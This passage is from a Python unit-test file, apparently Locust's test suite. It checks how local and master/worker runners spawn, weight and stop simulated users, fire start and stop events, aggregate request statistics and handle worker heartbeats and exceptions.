self.master_bind_port = 5557
self.heartbeat_liveness = 3
self.heartbeat_interval = 1
self.stop_timeout = None
self.connection_broken = False
def reset_stats(self):
pass
class HeyAnException(Exception):
pass
class TestLocustRunner(LocustTestCase):
def assert_locust_class_distribution(self, expected_distribution, classes):
# Construct a {UserClass => count} dict from a list of user classes
distribution = {}
for user_class in classes:
if not user_class in distribution:
distribution[user_class] = 0
distribution[user_class] += 1
expected_str = str({k.__name__: v for k, v in expected_distribution.items()})
actual_str = str({k.__name__: v for k, v in distribution.items()})
self.assertEqual(
expected_distribution,
distribution,
"Expected a User class distribution of %s but found %s"
% (
expected_str,
actual_str,
),
)
def test_cpu_warning(self):
_monitor_interval = runners.CPU_MONITOR_INTERVAL
runners.CPU_MONITOR_INTERVAL = 2.0
try:
class CpuUser(User):
wait_time = constant(0.001)
@task
def cpu_task(self):
for i in range(1000000):
_ = 3 / 2
environment = Environment(user_classes=[CpuUser])
runner = LocalRunner(environment)
self.assertFalse(runner.cpu_warning_emitted)
runner.spawn_users(1, 1, wait=False)
sleep(2.5)
runner.quit()
self.assertTrue(runner.cpu_warning_emitted)
finally:
runners.CPU_MONITOR_INTERVAL = _monitor_interval
def test_weight_locusts(self):
class BaseUser(User):
pass
class L1(BaseUser):
weight = 101
class L2(BaseUser):
weight = 99
class L3(BaseUser):
weight = 100
runner = Environment(user_classes=[L1, L2, L3]).create_local_runner()
self.assert_locust_class_distribution({L1: 10, L2: 9, L3: 10}, runner.weight_users(29))
self.assert_locust_class_distribution({L1: 10, L2: 10, L3: 10}, runner.weight_users(30))
self.assert_locust_class_distribution({L1: 11, L2: 10, L3: 10}, runner.weight_users(31))
def test_weight_locusts_fewer_amount_than_user_classes(self):
class BaseUser(User):
pass
class L1(BaseUser):
weight = 101
class L2(BaseUser):
weight = 99
class L3(BaseUser):
weight = 100
runner = Environment(user_classes=[L1, L2, L3]).create_local_runner()
self.assertEqual(1, len(runner.weight_users(1)))
self.assert_locust_class_distribution({L1: 1}, runner.weight_users(1))
def test_kill_locusts(self):
triggered = [False]
class BaseUser(User):
wait_time = constant(1)
@task
class task_set(TaskSet):
@task
def trigger(self):
triggered[0] = True
runner = Environment(user_classes=[BaseUser]).create_local_runner()
runner.spawn_users(2, spawn_rate=2, wait=False)
self.assertEqual(2, len(runner.user_greenlets))
g1 = list(runner.user_greenlets)[0]
g2 = list(runner.user_greenlets)[1]
runner.stop_users(2)
self.assertEqual(0, len(runner.user_greenlets))
self.assertTrue(g1.dead)
self.assertTrue(g2.dead)
self.assertTrue(triggered[0])
def test_start_event(self):
class MyUser(User):
wait_time = constant(1)
task_run_count = 0
@task
def my_task(self):
MyUser.task_run_count += 1
test_start_run = [0]
environment = Environment(user_classes=[MyUser])
def on_test_start(*args, **kwargs):
test_start_run[0] += 1
environment.events.test_start.add_listener(on_test_start)
runner = LocalRunner(environment)
runner.start(user_count=3, spawn_rate=3, wait=False)
runner.spawning_greenlet.get(timeout=3)
self.assertEqual(1, test_start_run[0])
self.assertEqual(3, MyUser.task_run_count)
def test_stop_event(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
test_stop_run = [0]
environment = Environment(user_classes=[User])
def on_test_stop(*args, **kwargs):
test_stop_run[0] += 1
environment.events.test_stop.add_listener(on_test_stop)
runner = LocalRunner(environment)
runner.start(user_count=3, spawn_rate=3, wait=False)
self.assertEqual(0, test_stop_run[0])
runner.stop()
self.assertEqual(1, test_stop_run[0])
def test_stop_event_quit(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
test_stop_run = [0]
environment = Environment(user_classes=[User])
def on_test_stop(*args, **kwargs):
test_stop_run[0] += 1
environment.events.test_stop.add_listener(on_test_stop)
runner = LocalRunner(environment)
runner.start(user_count=3, spawn_rate=3, wait=False)
self.assertEqual(0, test_stop_run[0])
runner.quit()
self.assertEqual(1, test_stop_run[0])
def test_stop_event_stop_and_quit(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
test_stop_run = [0]
environment = Environment(user_classes=[MyUser])
def on_test_stop(*args, **kwargs):
test_stop_run[0] += 1
environment.events.test_stop.add_listener(on_test_stop)
runner = LocalRunner(environment)
runner.start(user_count=3, spawn_rate=3, wait=False)
self.assertEqual(0, test_stop_run[0])
runner.stop()
runner.quit()
self.assertEqual(1, test_stop_run[0])
def test_change_user_count_during_spawning(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
environment = Environment(user_classes=[MyUser])
runner = LocalRunner(environment)
runner.start(user_count=10, spawn_rate=5, wait=False)
sleep(0.6)
runner.start(user_count=5, spawn_rate=5, wait=False)
runner.spawning_greenlet.join()
self.assertEqual(5, len(runner.user_greenlets))
runner.quit()
def test_reset_stats(self):
class MyUser(User):
@task
class task_set(TaskSet):
@task
def my_task(self):
self.user.environment.events.request.fire(
request_type="GET",
name="/test",
response_time=666,
response_length=1337,
exception=None,
context={},
)
sleep(2)
environment = Environment(user_classes=[MyUser], reset_stats=True)
runner = LocalRunner(environment)
runner.start(user_count=6, spawn_rate=12, wait=False)
sleep(0.25)
self.assertGreaterEqual(runner.stats.get("/test", "GET").num_requests, 3)
sleep(0.3)
self.assertLessEqual(runner.stats.get("/test", "GET").num_requests, 1)
runner.quit()
def test_no_reset_stats(self):
class MyUser(User):
@task
class task_set(TaskSet):
@task
def my_task(self):
self.user.environment.events.request.fire(
request_type="GET",
name="/test",
response_time=666,
response_length=1337,
exception=None,
context={},
)
sleep(2)
environment = Environment(reset_stats=False, user_classes=[MyUser])
runner = LocalRunner(environment)
runner.start(user_count=6, spawn_rate=12, wait=False)
sleep(0.25)
self.assertGreaterEqual(runner.stats.get("/test", "GET").num_requests, 3)
sleep(0.3)
self.assertEqual(6, runner.stats.get("/test", "GET").num_requests)
runner.quit()
def test_runner_reference_on_environment(self):
env = Environment()
runner = env.create_local_runner()
self.assertEqual(env, runner.environment)
self.assertEqual(runner, env.runner)
def test_users_can_call_runner_quit_without_deadlocking(self):
class BaseUser(User):
stop_triggered = False
@task
def trigger(self):
self.environment.runner.quit()
def on_stop(self):
BaseUser.stop_triggered = True
runner = Environment(user_classes=[BaseUser]).create_local_runner()
runner.spawn_users(1, 1, wait=False)
timeout = gevent.Timeout(0.5)
timeout.start()
try:
runner.greenlet.join()
except gevent.Timeout:
self.fail("Got Timeout exception, runner must have hung somehow.")
finally:
timeout.cancel()
self.assertTrue(BaseUser.stop_triggered)
def test_runner_quit_can_run_on_stop_for_multiple_users_concurrently(self):
class BaseUser(User):
stop_count = 0
@task
def trigger(self):
pass
def on_stop(self):
gevent.sleep(0.1)
BaseUser.stop_count += 1
runner = Environment(user_classes=[BaseUser]).create_local_runner()
runner.spawn_users(10, 10, wait=False)
timeout = gevent.Timeout(0.3)
timeout.start()
try:
runner.quit()
except gevent.Timeout:
self.fail("Got Timeout exception, runner must have hung somehow.")
finally:
timeout.cancel()
self.assertEqual(10, BaseUser.stop_count) # verify that all users executed on_stop
def test_stop_users_with_spawn_rate(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
environment = Environment(user_classes=[MyUser])
runner = LocalRunner(environment)
# Start load test, wait for users to start, then trigger ramp down
runner.start(10, 10, wait=False)
sleep(1)
runner.start(2, 4, wait=False)
# Wait a moment and then ensure the user count has started to drop but
# not immediately to user_count
sleep(1)
user_count = len(runner.user_greenlets)
self.assertTrue(user_count > 5, "User count has decreased too quickly: %i" % user_count)
self.assertTrue(user_count < 10, "User count has not decreased at all: %i" % user_count)
# Wait and ensure load test users eventually dropped to desired count
sleep(2)
user_count = len(runner.user_greenlets)
self.assertTrue(user_count == 2, "User count has not decreased correctly to 2, it is : %i" % user_count)
class TestMasterWorkerRunners(LocustTestCase):
def test_distributed_integration_run(self):
"""
Full integration test that starts both a MasterRunner and three WorkerRunner instances
and makes sure that their stats is sent to the Master.
"""
class TestUser(User):
wait_time = constant(0.1)
@task
def incr_stats(l):
l.environment.events.request.fire(
request_type="GET",
name="/",
response_time=1337,
response_length=666,
exception=None,
context={},
)
with mock.patch("locust.runners.WORKER_REPORT_INTERVAL", new=0.3):
# start a Master runner
master_env = Environment(user_classes=[TestUser])
master = master_env.create_master_runner("*", 0)
sleep(0)
# start 3 Worker runners
workers = []
for i in range(3):
worker_env = Environment(user_classes=[TestUser])
worker = worker_env.create_worker_runner("127.0.0.1", master.server.port)
workers.append(worker)
# give workers time to connect
sleep(0.1)
# issue start command that should trigger TestUsers to be spawned in the Workers
master.start(6, spawn_rate=1000)
sleep(0.1)
# check that worker nodes have started locusts
for worker in workers:
self.assertEqual(2, worker.user_count)
# give time for users to generate stats, and stats to be sent to master
sleep(1)
master.quit()
# make sure users are killed
for worker in workers:
self.assertEqual(0, worker.user_count)
# check that stats are present in master
self.assertGreater(
master_env.runner.stats.total.num_requests,
20,
"For some reason the master node's stats has not come in",
)
def test_test_stop_event(self):
class TestUser(User):
wait_time = constant(0.1)
@task
def my_task(l):
pass
with mock.patch("locust.runners.WORKER_REPORT_INTERVAL", new=0.3):
# start a Master runner
master_env = Environment(user_classes=[TestUser])
test_stop_count = {"master": 0, "worker": 0}
@master_env.events.test_stop.add_listener
def _(*args, **kwargs):
test_stop_count["master"] += 1
master = master_env.create_master_runner("*", 0)
sleep(0)
# start a Worker runner
worker_env = Environment(user_classes=[TestUser])
@worker_env.events.test_stop.add_listener
def _(*args, **kwargs):
test_stop_count["worker"] += 1
worker = worker_env.create_worker_runner("127.0.0.1", master.server.port)
# give worker time to connect
sleep(0.1)
# issue start command that should trigger TestUsers to be spawned in the Workers
master.start(2, spawn_rate=1000)
sleep(0.1)
# check that worker nodes have started locusts
self.assertEqual(2, worker.user_count)
# give time for users to generate stats, and stats to be sent to master
sleep(0.1)
master_env.events.quitting.fire(environment=master_env, reverse=True)
master.quit()
sleep(0.1)
# make sure users are killed
self.assertEqual(0, worker.user_count)
# check the test_stop event was called one time in master and zero times in workder
self.assertEqual(
1,
test_stop_count["master"],
"The test_stop event was not called exactly one time in the master node",
)
self.assertEqual(
0,
test_stop_count["worker"],
"The test_stop event was called in the worker node",
)
def test_distributed_shape(self):
"""
Full integration test that starts both a MasterRunner and three WorkerRunner instances
and tests a basic LoadTestShape with scaling up and down users
"""
class TestUser(User):
@task
def my_task(self):
pass
class TestShape(LoadTestShape):
def tick(self):
run_time = self.get_run_time()
if run_time < 2:
return (9, 9)
elif run_time < 4:
return (21, 21)
elif run_time < 6:
return (3, 21)
else:
return None
with mock.patch("locust.runners.WORKER_REPORT_INTERVAL", new=0.3):
test_shape = TestShape()
master_env = Environment(user_classes=[TestUser], shape_class=test_shape)
master_env.shape_class.reset_time()
master = master_env.create_master_runner("*", 0)
workers = []
for i in range(3):
worker_env = Environment(user_classes=[TestUser])
worker = worker_env.create_worker_runner("127.0.0.1", master.server.port)
workers.append(worker)
# Give workers time to connect
sleep(0.1)
# Start a shape test
master.start_shape()
sleep(1)
# Ensure workers have connected and started the correct amounf of users
for worker in workers:
self.assertEqual(3, worker.user_count, "Shape test has not reached stage 1")
self.assertEqual(
9, test_shape.get_current_user_count(), "Shape is not seeing stage 1 runner user count correctly"
)
# Ensure new stage with more users has been reached
sleep(2)
for worker in workers:
self.assertEqual(7, worker.user_count, "Shape test has not reached stage 2")
self.assertEqual(
21, test_shape.get_current_user_count(), "Shape is not seeing stage 2 runner user count correctly"
)
# Ensure new stage with less users has been reached
sleep(2)
for worker in workers:
self.assertEqual(1, worker.user_count, "Shape test has not reached stage 3")
self.assertEqual(
3, test_shape.get_current_user_count(), "Shape is not seeing stage 3 runner user count correctly"
)
# Ensure test stops at the end
sleep(2)
for worker in workers:
self.assertEqual(0, worker.user_count, "Shape test has not stopped")
self.assertEqual(
0, test_shape.get_current_user_count(), "Shape is not seeing stopped runner user count correctly"
)
def test_distributed_shape_stop_and_restart(self):
"""
Test stopping and then restarting a LoadTestShape
"""
class TestUser(User):
@task
def my_task(self):
pass
class TestShape(LoadTestShape):
def tick(self):
run_time = self.get_run_time()
if run_time < 10:
return (4, 4)
else:
return None
with mock.patch("locust.runners.WORKER_REPORT_INTERVAL", new=0.3):
master_env = Environment(user_classes=[TestUser], shape_class=TestShape())
master_env.shape_class.reset_time()
master = master_env.create_master_runner("*", 0)
workers = []
for i in range(2):
worker_env = Environment(user_classes=[TestUser])
worker = worker_env.create_worker_runner("127.0.0.1", master.server.port)
workers.append(worker)
# Give workers time to connect
sleep(0.1)
# Start a shape test and ensure workers have connected and started the correct amounf of users
master.start_shape()
sleep(1)
for worker in workers:
self.assertEqual(2, worker.user_count, "Shape test has not started correctly")
# Stop the test and ensure all user count is 0
master.stop()
sleep(1)
for worker in workers:
self.assertEqual(0, worker.user_count, "Shape test has not stopped")
# Then restart the test again and ensure workers have connected and started the correct amounf of users
master.start_shape()
sleep(1)
for worker in workers:
self.assertEqual(2, worker.user_count, "Shape test has not started again correctly")
master.stop()
class TestMasterRunner(LocustTestCase):
def setUp(self):
super().setUp()
self.environment = Environment(events=locust.events, catch_exceptions=False)
def tearDown(self):
super().tearDown()
def get_runner(self):
return self.environment.create_master_runner("*", 5557)
def test_worker_connect(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "zeh_fake_client1"))
self.assertEqual(1, len(master.clients))
self.assertTrue(
"zeh_fake_client1" in master.clients, "Could not find fake client in master instance's clients dict"
)
server.mocked_send(Message("client_ready", None, "zeh_fake_client2"))
server.mocked_send(Message("client_ready", None, "zeh_fake_client3"))
server.mocked_send(Message("client_ready", None, "zeh_fake_client4"))
self.assertEqual(4, len(master.clients))
server.mocked_send(Message("quit", None, "zeh_fake_client3"))
self.assertEqual(3, len(master.clients))
def test_worker_stats_report_median(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "fake_client"))
master.stats.get("/", "GET").log(100, 23455)
master.stats.get("/", "GET").log(800, 23455)
master.stats.get("/", "GET").log(700, 23455)
data = {"user_count": 1}
self.environment.events.report_to_master.fire(client_id="fake_client", data=data)
master.stats.clear_all()
server.mocked_send(Message("stats", data, "fake_client"))
s = master.stats.get("/", "GET")
self.assertEqual(700, s.median_response_time)
def test_worker_stats_report_with_none_response_times(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "fake_client"))
master.stats.get("/mixed", "GET").log(0, 23455)
master.stats.get("/mixed", "GET").log(800, 23455)
master.stats.get("/mixed", "GET").log(700, 23455)
master.stats.get("/mixed", "GET").log(None, 23455)
master.stats.get("/mixed", "GET").log(None, 23455)
master.stats.get("/mixed", "GET").log(None, 23455)
master.stats.get("/mixed", "GET").log(None, 23455)
master.stats.get("/onlyNone", "GET").log(None, 23455)
data = {"user_count": 1}
self.environment.events.report_to_master.fire(client_id="fake_client", data=data)
master.stats.clear_all()
server.mocked_send(Message("stats", data, "fake_client"))
s1 = master.stats.get("/mixed", "GET")
self.assertEqual(700, s1.median_response_time)
self.assertEqual(500, s1.avg_response_time)
s2 = master.stats.get("/onlyNone", "GET")
self.assertEqual(0, s2.median_response_time)
self.assertEqual(0, s2.avg_response_time)
def test_master_marks_downed_workers_as_missing(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "fake_client"))
sleep(6)
# print(master.clients['fake_client'].__dict__)
assert master.clients["fake_client"].state == STATE_MISSING
def test_last_worker_quitting_stops_test(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "fake_client1"))
server.mocked_send(Message("client_ready", None, "fake_client2"))
master.start(1, 2)
server.mocked_send(Message("spawning", None, "fake_client1"))
server.mocked_send(Message("spawning", None, "fake_client2"))
server.mocked_send(Message("quit", None, "fake_client1"))
sleep(0)
self.assertEqual(1, len(master.clients.all))
self.assertNotEqual(STATE_STOPPED, master.state, "Not all workers quit but test stopped anyway.")
server.mocked_send(Message("quit", None, "fake_client2"))
sleep(0)
self.assertEqual(0, len(master.clients.all))
self.assertEqual(STATE_STOPPED, master.state, "All workers quit but test didn't stop.")
@mock.patch("locust.runners.HEARTBEAT_INTERVAL", new=0.1)
def test_last_worker_missing_stops_test(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "fake_client1"))
server.mocked_send(Message("client_ready", None, "fake_client2"))
server.mocked_send(Message("client_ready", None, "fake_client3"))
master.start(3, 3)
server.mocked_send(Message("spawning", None, "fake_client1"))
server.mocked_send(Message("spawning", None, "fake_client2"))
server.mocked_send(Message("spawning", None, "fake_client3"))
sleep(0.2)
server.mocked_send(
Message("heartbeat", {"state": STATE_RUNNING, "current_cpu_usage": 50, "count": 1}, "fake_client1")
)
server.mocked_send(
Message("heartbeat", {"state": STATE_RUNNING, "current_cpu_usage": 50, "count": 1}, "fake_client2")
)
server.mocked_send(
Message("heartbeat", {"state": STATE_RUNNING, "current_cpu_usage": 50, "count": 1}, "fake_client3")
)
sleep(0.2)
self.assertEqual(0, len(master.clients.missing))
self.assertEqual(3, master.worker_count)
self.assertNotIn(
master.state, [STATE_STOPPED, STATE_STOPPING], "Not all workers went missing but test stopped anyway."
)
server.mocked_send(
Message("heartbeat", {"state": STATE_RUNNING, "current_cpu_usage": 50, "count": 1}, "fake_client1")
)
sleep(0.4)
self.assertEqual(2, len(master.clients.missing))
self.assertEqual(1, master.worker_count)
self.assertNotIn(
master.state, [STATE_STOPPED, STATE_STOPPING], "Not all workers went missing but test stopped anyway."
)
sleep(0.2)
self.assertEqual(3, len(master.clients.missing))
self.assertEqual(0, master.worker_count)
self.assertEqual(STATE_STOPPED, master.state, "All workers went missing but test didn't stop.")
def test_master_total_stats(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "fake_client"))
stats = RequestStats()
stats.log_request("GET", "/1", 100, 3546)
stats.log_request("GET", "/1", 800, 56743)
stats2 = RequestStats()
stats2.log_request("GET", "/2", 700, 2201)
server.mocked_send(
Message(
"stats",
{
"stats": stats.serialize_stats(),
"stats_total": stats.total.serialize(),
"errors": stats.serialize_errors(),
"user_count": 1,
},
"fake_client",
)
)
server.mocked_send(
Message(
"stats",
{
"stats": stats2.serialize_stats(),
"stats_total": stats2.total.serialize(),
"errors": stats2.serialize_errors(),
"user_count": 2,
},
"fake_client",
)
)
self.assertEqual(700, master.stats.total.median_response_time)
def test_master_total_stats_with_none_response_times(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "fake_client"))
stats = RequestStats()
stats.log_request("GET", "/1", 100, 3546)
stats.log_request("GET", "/1", 800, 56743)
stats.log_request("GET", "/1", None, 56743)
stats2 = RequestStats()
stats2.log_request("GET", "/2", 700, 2201)
stats2.log_request("GET", "/2", None, 2201)
stats3 = RequestStats()
stats3.log_request("GET", "/3", None, 2201)
server.mocked_send(
Message(
"stats",
{
"stats": stats.serialize_stats(),
"stats_total": stats.total.serialize(),
"errors": stats.serialize_errors(),
"user_count": 1,
},
"fake_client",
)
)
server.mocked_send(
Message(
"stats",
{
"stats": stats2.serialize_stats(),
"stats_total": stats2.total.serialize(),
"errors": stats2.serialize_errors(),
"user_count": 2,
},
"fake_client",
)
)
server.mocked_send(
Message(
"stats",
{
"stats": stats3.serialize_stats(),
"stats_total": stats3.total.serialize(),
"errors": stats3.serialize_errors(),
"user_count": 2,
},
"fake_client",
)
)
self.assertEqual(700, master.stats.total.median_response_time)
def test_master_current_response_times(self):
start_time = 1
with mock.patch("time.time") as mocked_time:
mocked_time.return_value = start_time
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
self.environment.stats.reset_all()
mocked_time.return_value += 1.0234
server.mocked_send(Message("client_ready", None, "fake_client"))
stats = RequestStats()
stats.log_request("GET", "/1", 100, 3546)
stats.log_request("GET", "/1", 800, 56743)
server.mocked_send(
Message(
"stats",
{
"stats": stats.serialize_stats(),
"stats_total": stats.total.get_stripped_report(),
"errors": stats.serialize_errors(),
"user_count": 1,
},
"fake_client",
)
)
mocked_time.return_value += 1
stats2 = RequestStats()
stats2.log_request("GET", "/2", 400, 2201)
server.mocked_send(
Message(
"stats",
{
"stats": stats2.serialize_stats(),
"stats_total": stats2.total.get_stripped_report(),
"errors": stats2.serialize_errors(),
"user_count": 2,
},
"fake_client",
)
)
mocked_time.return_value += 4
self.assertEqual(400, master.stats.total.get_current_response_time_percentile(0.5))
self.assertEqual(800, master.stats.total.get_current_response_time_percentile(0.95))
# let 10 second pass, do some more requests, send it to the master and make
# sure the current response time percentiles only accounts for these new requests
mocked_time.return_value += 10.10023
stats.log_request("GET", "/1", 20, 1)
stats.log_request("GET", "/1", 30, 1)
stats.log_request("GET", "/1", 3000, 1)
server.mocked_send(
Message(
"stats",
{
"stats": stats.serialize_stats(),
"stats_total": stats.total.get_stripped_report(),
"errors": stats.serialize_errors(),
"user_count": 2,
},
"fake_client",
)
)
self.assertEqual(30, master.stats.total.get_current_response_time_percentile(0.5))
self.assertEqual(3000, master.stats.total.get_current_response_time_percentile(0.95))
def test_rebalance_locust_users_on_worker_connect(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "zeh_fake_client1"))
self.assertEqual(1, len(master.clients))
self.assertTrue(
"zeh_fake_client1" in master.clients, "Could not find fake client in master instance's clients dict"
)
master.start(100, 20)
self.assertEqual(1, len(server.outbox))
client_id, msg = server.outbox.pop()
self.assertEqual(100, msg.data["num_users"])
self.assertEqual(20, msg.data["spawn_rate"])
# let another worker connect
server.mocked_send(Message("client_ready", None, "zeh_fake_client2"))
self.assertEqual(2, len(master.clients))
self.assertEqual(2, len(server.outbox))
client_id, msg = server.outbox.pop()
self.assertEqual(50, msg.data["num_users"])
self.assertEqual(10, msg.data["spawn_rate"])
client_id, msg = server.outbox.pop()
self.assertEqual(50, msg.data["num_users"])
self.assertEqual(10, msg.data["spawn_rate"])
def test_sends_spawn_data_to_ready_running_spawning_workers(self):
"""Sends spawn job to running, ready, or spawning workers"""
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
master.clients[1] = WorkerNode(1)
master.clients[2] = WorkerNode(2)
master.clients[3] = WorkerNode(3)
master.clients[1].state = STATE_INIT
master.clients[2].state = STATE_SPAWNING
master.clients[3].state = STATE_RUNNING
master.start(user_count=5, spawn_rate=5)
self.assertEqual(3, len(server.outbox))
def test_start_event(self):
"""
Tests that test_start event is fired
"""
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
run_count = [0]
@self.environment.events.test_start.add_listener
def on_test_start(*a, **kw):
run_count[0] += 1
for i in range(5):
server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
master.start(7, 7)
self.assertEqual(5, len(server.outbox))
self.assertEqual(1, run_count[0])
# change number of users and check that test_start isn't fired again
master.start(7, 7)
self.assertEqual(1, run_count[0])
# stop and start to make sure test_start is fired again
master.stop()
master.start(3, 3)
self.assertEqual(2, run_count[0])
master.quit()
def test_stop_event(self):
"""
Tests that test_stop event is fired
"""
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
run_count = [0]
@self.environment.events.test_stop.add_listener
def on_test_stop(*a, **kw):
run_count[0] += 1
for i in range(5):
server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
master.start(7, 7)
self.assertEqual(5, len(server.outbox))
master.stop()
self.assertEqual(1, run_count[0])
run_count[0] = 0
for i in range(5):
server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
master.start(7, 7)
master.stop()
master.quit()
self.assertEqual(1, run_count[0])
def test_stop_event_quit(self):
"""
Tests that test_stop event is fired when quit() is called directly
"""
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
run_count = [0]
@self.environment.events.test_stop.add_listener
def on_test_stop(*a, **kw):
run_count[0] += 1
for i in range(5):
server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
master.start(7, 7)
self.assertEqual(5, len(server.outbox))
master.quit()
self.assertEqual(1, run_count[0])
def test_spawn_zero_locusts(self):
class MyTaskSet(TaskSet):
@task
def my_task(self):
pass
class MyTestUser(User):
tasks = [MyTaskSet]
wait_time = constant(0.1)
environment = Environment(user_classes=[MyTestUser])
runner = LocalRunner(environment)
timeout = gevent.Timeout(2.0)
timeout.start()
try:
runner.start(0, 1, wait=True)
runner.spawning_greenlet.join()
except gevent.Timeout:
self.fail("Got Timeout exception. A locust seems to have been spawned, even though 0 was specified.")
finally:
timeout.cancel()
def test_spawn_uneven_locusts(self):
"""
Tests that we can accurately spawn a certain number of locusts, even if it's not an
even number of the connected workers
"""
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
for i in range(5):
server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
master.start(7, 7)
self.assertEqual(5, len(server.outbox))
num_users = 0
for _, msg in server.outbox:
num_users += msg.data["num_users"]
self.assertEqual(7, num_users, "Total number of locusts that would have been spawned is not 7")
def test_spawn_fewer_locusts_than_workers(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
for i in range(5):
server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
master.start(2, 2)
self.assertEqual(5, len(server.outbox))
num_users = 0
for _, msg in server.outbox:
num_users += msg.data["num_users"]
self.assertEqual(2, num_users, "Total number of locusts that would have been spawned is not 2")
def test_custom_shape_scale_up(self):
class MyUser(User):
@task
def my_task(self):
pass
class TestShape(LoadTestShape):
def tick(self):
run_time = self.get_run_time()
if run_time < 2:
return (1, 1)
elif run_time < 4:
return (2, 2)
else:
return None
self.environment.user_classes = [MyUser]
self.environment.shape_class = TestShape()
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
for i in range(5):
server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
# Start the shape_worker
self.environment.shape_class.reset_time()
master.start_shape()
sleep(0.5)
# Wait for shape_worker to update user_count
num_users = 0
for _, msg in server.outbox:
if msg.data:
num_users += msg.data["num_users"]
self.assertEqual(
1, num_users, "Total number of users in first stage of shape test is not 1: %i" % num_users
)
# Wait for shape_worker to update user_count again
sleep(2)
num_users = 0
for _, msg in server.outbox:
if msg.data:
num_users += msg.data["num_users"]
self.assertEqual(
3, num_users, "Total number of users in second stage of shape test is not 3: %i" % num_users
)
# Wait to ensure shape_worker has stopped the test
sleep(3)
self.assertEqual("stopped", master.state, "The test has not been stopped by the shape class")
def test_custom_shape_scale_down(self):
class MyUser(User):
@task
def my_task(self):
pass
class TestShape(LoadTestShape):
def tick(self):
run_time = self.get_run_time()
if run_time < 2:
return (5, 5)
elif run_time < 4:
return (-4, 4)
else:
return None
self.environment.user_classes = [MyUser]
self.environment.shape_class = TestShape()
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
for i in range(5):
server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
# Start the shape_worker
self.environment.shape_class.reset_time()
master.start_shape()
sleep(0.5)
# Wait for shape_worker to update user_count
num_users = 0
for _, msg in server.outbox:
if msg.data:
num_users += msg.data["num_users"]
self.assertEqual(
5, num_users, "Total number of users in first stage of shape test is not 5: %i" % num_users
)
# Wait for shape_worker to update user_count again
sleep(2)
num_users = 0
for _, msg in server.outbox:
if msg.data:
num_users += msg.data["num_users"]
self.assertEqual(
1, num_users, "Total number of users in second stage of shape test is not 1: %i" % num_users
)
# Wait to ensure shape_worker has stopped the test
sleep(3)
self.assertEqual("stopped", master.state, "The test has not been stopped by the shape class")
def test_exception_in_task(self):
class MyUser(User):
@task
def will_error(self):
raise HeyAnException(":(")
self.environment.user_classes = [MyUser]
runner = self.environment.create_local_runner()
l = MyUser(self.environment)
self.assertRaises(HeyAnException, l.run)
self.assertRaises(HeyAnException, l.run)
self.assertEqual(1, len(runner.exceptions))
hash_key, exception = runner.exceptions.popitem()
self.assertTrue("traceback" in exception)
self.assertTrue("HeyAnException" in exception["traceback"])
self.assertEqual(2, exception["count"])
def test_exception_is_caught(self):
"""Test that exceptions are stored, and execution continues"""
class MyTaskSet(TaskSet):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
self._task_queue = [self.will_error, self.will_stop]
@task(1)
def will_error(self):
raise HeyAnException(":(")
@task(1)
def will_stop(self):
raise StopUser()
class MyUser(User):
wait_time = constant(0.01)
tasks = [MyTaskSet]
# set config to catch exceptions in locust users
self.environment.catch_exceptions = True
self.environment.user_classes = [MyUser]
runner = LocalRunner(self.environment)
l = MyUser(self.environment)
# make sure HeyAnException isn't raised
l.run()
l.run()
# make sure we got two entries in the error log
self.assertEqual(2, len(self.mocked_log.error))
# make sure exception was stored
self.assertEqual(1, len(runner.exceptions))
hash_key, exception = runner.exceptions.popitem()
self.assertTrue("traceback" in exception)
self.assertTrue("HeyAnException" in exception["traceback"])
self.assertEqual(2, exception["count"])
def test_master_reset_connection(self):
"""Test that connection will be reset when network issues found"""
with mock.patch("locust.runners.FALLBACK_INTERVAL", new=0.1):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
self.assertEqual(0, len(master.clients))
server.mocked_send(Message("client_ready", NETWORK_BROKEN, "fake_client"))
self.assertTrue(master.connection_broken)
server.mocked_send(Message("client_ready", None, "fake_client"))
sleep(0.2)
self.assertFalse(master.connection_broken)
